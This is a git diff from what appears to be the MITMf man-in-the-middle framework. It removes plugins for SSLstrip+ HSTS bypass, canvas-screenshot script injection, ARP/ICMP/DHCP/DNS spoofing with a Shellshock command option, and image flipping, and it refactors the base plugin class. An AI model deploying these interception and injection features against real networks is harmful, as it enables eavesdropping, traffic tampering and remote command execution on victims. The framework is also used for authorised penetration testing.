# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import sys
|
|
||||||
import logging
|
|
||||||
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from core.sslstrip.URLMonitor import URLMonitor
|
|
||||||
from core.servers.dns.DNSchef import DNSChef
|
|
||||||
from core.utils import IpTables
|
|
||||||
|
|
||||||
class HSTSbypass(Plugin):
|
|
||||||
name = 'SSLstrip+'
|
|
||||||
optname = 'hsts'
|
|
||||||
desc = 'Enables SSLstrip+ for partial HSTS bypass'
|
|
||||||
version = "0.4"
|
|
||||||
tree_info = ["SSLstrip+ by Leonardo Nve running"]
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.options = options
|
|
||||||
self.manualiptables = options.manualiptables
|
|
||||||
|
|
||||||
if not options.manualiptables:
|
|
||||||
if IpTables.getInstance().dns is False:
|
|
||||||
IpTables.getInstance().DNS(self.config['MITMf']['DNS']['port'])
|
|
||||||
|
|
||||||
URLMonitor.getInstance().setHstsBypass()
|
|
||||||
DNSChef.getInstance().setHstsBypass()
|
|
||||||
|
|
||||||
def finish(self):
|
|
||||||
if not self.manualiptables:
|
|
||||||
if IpTables.getInstance().dns is True:
|
|
||||||
IpTables.getInstance().Flush()
|
|
|
@ -1,63 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import logging
|
|
||||||
import base64
|
|
||||||
import urllib
|
|
||||||
import re
|
|
||||||
|
|
||||||
from datetime import datetime
|
|
||||||
from plugins.Inject import Inject
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger('mitmf')
|
|
||||||
|
|
||||||
class ScreenShotter(Inject, Plugin):
|
|
||||||
name = 'ScreenShotter'
|
|
||||||
optname = 'screen'
|
|
||||||
desc = 'Uses HTML5 Canvas to render an accurate screenshot of a clients browser'
|
|
||||||
ver = '0.1'
|
|
||||||
has_opts = True
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.interval = 10 or options.interval
|
|
||||||
Inject.initialize(self, options)
|
|
||||||
self.html_payload = self.get_payload()
|
|
||||||
|
|
||||||
def clientRequest(self, request):
|
|
||||||
if 'saveshot' in request.uri:
|
|
||||||
request.printPostData = False
|
|
||||||
client = request.client.getClientIP()
|
|
||||||
img_file = '{}-{}-{}.png'.format(client, request.headers['host'], datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s"))
|
|
||||||
try:
|
|
||||||
with open('./logs/' + img_file, 'wb') as img:
|
|
||||||
img.write(base64.b64decode(urllib.unquote(request.postData).decode('utf8').split(',')[1]))
|
|
||||||
img.close()
|
|
||||||
|
|
||||||
mitmf_logger.info('{} [ScreenShotter] Saved screenshot to {}'.format(client, img_file))
|
|
||||||
except Exception as e:
|
|
||||||
mitmf_logger.error('{} [ScreenShotter] Error saving screenshot: {}'.format(client, e))
|
|
||||||
|
|
||||||
def get_payload(self):
|
|
||||||
canvas = re.sub("SECONDS_GO_HERE", str(self.interval*1000), open("./core/javascript/screenshot.js", "rb").read())
|
|
||||||
return '<script type="text/javascript">' + canvas + '</script>'
|
|
||||||
|
|
||||||
def pluginOptions(self, options):
|
|
||||||
options.add_argument("--interval", dest="interval", type=int, metavar="SECONDS", default=None, help="Interval at which screenshots will be taken (default 10 seconds)")
|
|
132
plugins/Spoof.py
132
plugins/Spoof.py
|
@ -1,132 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
from core.utils import SystemConfig, IpTables, shutdown
|
|
||||||
from core.poisoners.arp.ARPpoisoner import ARPpoisoner
|
|
||||||
from core.poisoners.arp.ARPWatch import ARPWatch
|
|
||||||
from core.servers.dns.DNSchef import DNSChef
|
|
||||||
from core.poisoners.dhcp.DHCPpoisoner import DHCPpoisoner
|
|
||||||
from core.poisoners.icmp.ICMPpoisoner import ICMPpoisoner
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from scapy.all import *
|
|
||||||
|
|
||||||
class Spoof(Plugin):
|
|
||||||
name = "Spoof"
|
|
||||||
optname = "spoof"
|
|
||||||
desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS"
|
|
||||||
version = "0.6"
|
|
||||||
has_opts = True
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
|
||||||
self.options = options
|
|
||||||
self.dnscfg = self.config['MITMf']['DNS']
|
|
||||||
self.dhcpcfg = self.config['Spoof']['DHCP']
|
|
||||||
self.targets = options.targets
|
|
||||||
self.arpmode = options.arpmode or 'rep'
|
|
||||||
self.manualiptables = options.manualiptables
|
|
||||||
self.mymac = SystemConfig.getMAC(options.interface)
|
|
||||||
self.myip = SystemConfig.getIP(options.interface)
|
|
||||||
self.protocolInstances = []
|
|
||||||
|
|
||||||
#Makes scapy more verbose
|
|
||||||
debug = False
|
|
||||||
|
|
||||||
if options.arp:
|
|
||||||
|
|
||||||
if not options.gateway:
|
|
||||||
shutdown("[-] --arp argument requires --gateway")
|
|
||||||
|
|
||||||
if options.targets is None:
|
|
||||||
#if were poisoning whole subnet, start ARP-Watch
|
|
||||||
arpwatch = ARPWatch(options.gateway, self.myip, options.interface)
|
|
||||||
arpwatch.debug = debug
|
|
||||||
|
|
||||||
self.tree_info.append("ARPWatch online")
|
|
||||||
self.protocolInstances.append(arpwatch)
|
|
||||||
|
|
||||||
arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets)
|
|
||||||
arp.arpmode = self.arpmode
|
|
||||||
arp.debug = debug
|
|
||||||
|
|
||||||
self.protocolInstances.append(arp)
|
|
||||||
|
|
||||||
|
|
||||||
elif options.icmp:
|
|
||||||
|
|
||||||
if not options.gateway:
|
|
||||||
shutdown("[-] --icmp argument requires --gateway")
|
|
||||||
|
|
||||||
if not options.targets:
|
|
||||||
shutdown("[-] --icmp argument requires --targets")
|
|
||||||
|
|
||||||
icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, self.myip)
|
|
||||||
icmp.debug = debug
|
|
||||||
|
|
||||||
self.protocolInstances.append(icmp)
|
|
||||||
|
|
||||||
elif options.dhcp:
|
|
||||||
|
|
||||||
if options.targets:
|
|
||||||
shutdown("[-] --targets argument invalid when DCHP spoofing")
|
|
||||||
|
|
||||||
dhcp = DHCPServer(options.interface, self.dhcpcfg, self.myip, self.mymac)
|
|
||||||
dhcp.shellshock = options.shellshock
|
|
||||||
dhcp.debug = debug
|
|
||||||
self.protocolInstances.append(dhcp)
|
|
||||||
|
|
||||||
if options.dns:
|
|
||||||
|
|
||||||
if not options.manualiptables:
|
|
||||||
if IpTables.getInstance().dns is False:
|
|
||||||
IpTables.getInstance().DNS(self.dnscfg['port'])
|
|
||||||
|
|
||||||
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
|
|
||||||
shutdown("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")
|
|
||||||
|
|
||||||
SystemConfig.setIpForwarding(1)
|
|
||||||
|
|
||||||
if not options.manualiptables:
|
|
||||||
if IpTables.getInstance().http is False:
|
|
||||||
IpTables.getInstance().HTTP(options.listen)
|
|
||||||
|
|
||||||
for protocol in self.protocolInstances:
|
|
||||||
protocol.start()
|
|
||||||
|
|
||||||
def pluginOptions(self, options):
|
|
||||||
group = options.add_mutually_exclusive_group(required=False)
|
|
||||||
group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
|
|
||||||
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
|
|
||||||
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
|
|
||||||
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries')
|
|
||||||
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
|
||||||
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
|
||||||
options.add_argument('--targets', dest='targets', default=None, help='Specify host/s to poison [if ommited will default to subnet]')
|
|
||||||
options.add_argument('--arpmode',type=str, dest='arpmode', default=None, choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')
|
|
||||||
|
|
||||||
def finish(self):
|
|
||||||
for protocol in self.protocolInstances:
|
|
||||||
if hasattr(protocol, 'stop'):
|
|
||||||
protocol.stop()
|
|
||||||
|
|
||||||
if not self.manualiptables:
|
|
||||||
IpTables.getInstance().Flush()
|
|
||||||
|
|
||||||
SystemConfig.setIpForwarding(0)
|
|
|
@ -1,69 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import logging
|
|
||||||
from cStringIO import StringIO
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from PIL import Image, ImageFile
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class Upsidedownternet(Plugin):
|
|
||||||
name = "Upsidedownternet"
|
|
||||||
optname = "upsidedownternet"
|
|
||||||
desc = 'Flips images 180 degrees'
|
|
||||||
version = "0.1"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
globals()['Image'] = Image
|
|
||||||
globals()['ImageFile'] = ImageFile
|
|
||||||
self.options = options
|
|
||||||
|
|
||||||
def serverHeaders(self, response, request):
|
|
||||||
'''Kill the image skipping that's in place for speed reasons'''
|
|
||||||
if request.isImageRequest:
|
|
||||||
request.isImageRequest = False
|
|
||||||
request.isImage = True
|
|
||||||
self.imageType = response.headers['content-type'].split('/')[1].upper()
|
|
||||||
|
|
||||||
def serverResponse(self, response, request, data):
|
|
||||||
try:
|
|
||||||
isImage = getattr(request, 'isImage')
|
|
||||||
except AttributeError:
|
|
||||||
isImage = False
|
|
||||||
|
|
||||||
if isImage:
|
|
||||||
try:
|
|
||||||
#For some reason more images get parsed using the parser
|
|
||||||
#rather than a file...PIL still needs some work I guess
|
|
||||||
p = ImageFile.Parser()
|
|
||||||
p.feed(data)
|
|
||||||
im = p.close()
|
|
||||||
im = im.transpose(Image.ROTATE_180)
|
|
||||||
output = StringIO()
|
|
||||||
im.save(output, format=self.imageType)
|
|
||||||
data = output.getvalue()
|
|
||||||
output.close()
|
|
||||||
mitmf_logger.info("{} [Upsidedownternet] Flipped image".format(response.getClientIP()))
|
|
||||||
except Exception as e:
|
|
||||||
mitmf_logger.info("{} [Upsidedownternet] Error: {}".format(response.getClientIP(), e))
|
|
||||||
|
|
||||||
return {'response': response, 'request': request, 'data': data}
|
|
|
@ -1,5 +1,3 @@
|
||||||
#Hack grabbed from http://stackoverflow.com/questions/1057431/loading-all-modules-in-a-folder-in-python
|
|
||||||
#Has to be a cleaner way to do this, but it works for now
|
|
||||||
import os
|
import os
|
||||||
import glob
|
import glob
|
||||||
__all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")]
|
__all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")]
|
||||||
|
|
|
@ -1,25 +1,52 @@
|
||||||
'''
|
#!/usr/bin/env python2.7
|
||||||
The base plugin class. This shows the various methods that
|
|
||||||
can get called during the MITM attack.
|
|
||||||
'''
|
|
||||||
from core.configwatcher import ConfigWatcher
|
|
||||||
import logging
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger('mitmf')
|
# Copyright (c) 2014-2016 Marcello Salvati
|
||||||
|
#
|
||||||
|
# This program is free software; you can redistribute it and/or
|
||||||
|
# modify it under the terms of the GNU General Public License as
|
||||||
|
# published by the Free Software Foundation; either version 3 of the
|
||||||
|
# License, or (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful, but
|
||||||
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||||
|
# General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program; if not, write to the Free Software
|
||||||
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||||
|
# USA
|
||||||
|
#
|
||||||
|
|
||||||
|
import logging
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
from core.configwatcher import ConfigWatcher
|
||||||
|
from core.logger import logger
|
||||||
|
|
||||||
class Plugin(ConfigWatcher, object):
|
class Plugin(ConfigWatcher, object):
|
||||||
name = "Generic plugin"
|
name = "Generic plugin"
|
||||||
optname = "generic"
|
optname = "generic"
|
||||||
tree_info = list()
|
tree_info = []
|
||||||
desc = ""
|
desc = ""
|
||||||
version = "0.0"
|
version = "0.0"
|
||||||
has_opts = False
|
|
||||||
|
def __init__(self, parser):
|
||||||
|
'''Passed the options namespace'''
|
||||||
|
if self.desc:
|
||||||
|
sgroup = parser.add_argument_group(self.name, self.desc)
|
||||||
|
else:
|
||||||
|
sgroup = parser.add_argument_group(self.name,"Options for the '{}' plugin".format(self.name))
|
||||||
|
|
||||||
|
sgroup.add_argument("--{}".format(self.optname), action="store_true",help="Load plugin '{}'".format(self.name))
|
||||||
|
|
||||||
|
self.options(sgroup)
|
||||||
|
|
||||||
def initialize(self, options):
|
def initialize(self, options):
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
self.options = options
|
self.options = options
|
||||||
|
|
||||||
def clientRequest(self, request):
|
def request(self, request):
|
||||||
'''
|
'''
|
||||||
Handles all outgoing requests, hooks connectionMade()
|
Handles all outgoing requests, hooks connectionMade()
|
||||||
request object has the following attributes:
|
request object has the following attributes:
|
||||||
|
@ -32,32 +59,43 @@ class Plugin(ConfigWatcher, object):
|
||||||
'''
|
'''
|
||||||
pass
|
pass
|
||||||
|
|
||||||
def serverHeaders(self, response, request):
|
def responseheaders(self, response, request):
|
||||||
'''
|
'''
|
||||||
Handles all response headers, hooks handleEndHeaders()
|
Handles all response headers, hooks handleEndHeaders()
|
||||||
'''
|
'''
|
||||||
pass
|
pass
|
||||||
|
|
||||||
def serverResponseStatus(self, request, version, code, message):
|
def responsestatus(self, request, version, code, message):
|
||||||
'''
|
'''
|
||||||
Handles server response HTTP version, code and message
|
Handles server response HTTP version, code and message
|
||||||
'''
|
'''
|
||||||
return {"request": request, "version": version, "code": code, "message": message}
|
return {"request": request, "version": version, "code": code, "message": message}
|
||||||
|
|
||||||
def serverResponse(self, response, request, data):
|
def response(self, response, request, data):
|
||||||
'''
|
'''
|
||||||
Handles all non-image responses by default, hooks handleResponse() (See Upsidedownternet for how to get images)
|
Handles all non-image responses by default, hooks handleResponse() (See Upsidedownternet for how to get images)
|
||||||
'''
|
'''
|
||||||
return {'response': response, 'request':request, 'data': data}
|
return {'response': response, 'request':request, 'data': data}
|
||||||
|
|
||||||
def pluginOptions(self, options):
|
def on_config_change(self):
|
||||||
|
"""Do something when MITMf detects the config file has been modified"""
|
||||||
|
pass
|
||||||
|
|
||||||
|
def options(self, options):
|
||||||
'''Add your options to the options parser'''
|
'''Add your options to the options parser'''
|
||||||
pass
|
pass
|
||||||
|
|
||||||
def pluginReactor(self, strippingFactory):
|
def reactor(self, strippingFactory):
|
||||||
'''This sets up another instance of the reactor on a diffrent port, passed the default factory'''
|
'''This makes it possible to set up another instance of the reactor on a diffrent port, passed the default factory'''
|
||||||
pass
|
pass
|
||||||
|
|
||||||
def finish(self):
|
def setup_logger(self):
|
||||||
|
formatter = logging.Formatter("%(asctime)s [{}] %(message)s".format(self.name), datefmt="%Y-%m-%d %H:%M:%S")
|
||||||
|
self.log = logger().setup_logger(self.name, formatter)
|
||||||
|
|
||||||
|
formatter = logging.Formatter("%(asctime)s %(clientip)s [type:%(browser)s-%(browserv)s os:%(clientos)s] [{}] %(message)s".format(self.name), datefmt="%Y-%m-%d %H:%M:%S")
|
||||||
|
self.clientlog = logger().setup_logger("{}_{}".format(self.name, "clientlog"), formatter)
|
||||||
|
|
||||||
|
def on_shutdown(self):
|
||||||
'''This will be called when shutting down'''
|
'''This will be called when shutting down'''
|
||||||
pass
|
pass
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue